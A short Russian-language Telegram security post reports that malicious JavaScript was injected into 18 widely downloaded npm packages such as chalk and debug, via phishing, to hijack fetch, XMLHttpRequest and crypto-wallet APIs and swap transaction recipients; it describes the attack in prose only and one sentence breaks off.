Вредоносный js-код добавлен в 18+ npm-зависимостей для frontend-приложений. Суммарно эти зависимости имеют более 2 миллиардов загрузок в неделю.
backslash (0.26m downloads per week)
chalk-template (3.9m downloads per week)
supports-hyperlinks (19.2m downloads per week)
has-ansi (12.1m downloads per week)
simple-swizzle (26.26m downloads per week)
color-string (27.48m downloads per week)
error-ex (47.17m downloads per week)
color-name (191.71m downloads per week)
is-arrayish (73.8m downloads per week)
slice-ansi (59.8m downloads per week)
color-convert (193.5m downloads per week)
wrap-ansi (197.99m downloads per week)
ansi-regex (243.64m downloads per week)
supports-color (287.1m downloads per week)
strip-ansi (261.17m downloads per week)
chalk (299.99m downloads per week)
debug (357.6m downloads per week)
ansi-styles (371.41m downloads per week)
Атака типичная: фишинговое письмо
Код злоумышленников переопределял функции для отправки сетевых запросов fetch, XMLHttpRequest, и API кошельков (window.ethereum, Solana и др.), анализировал запросы/ответы и на лету подменял получателя в криптовалютных транзакциях.
Цель злоумышленников - frontend-приложения с функциями перевода криптовалюты
В этих случаях вредоносный js-код может месяцами
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM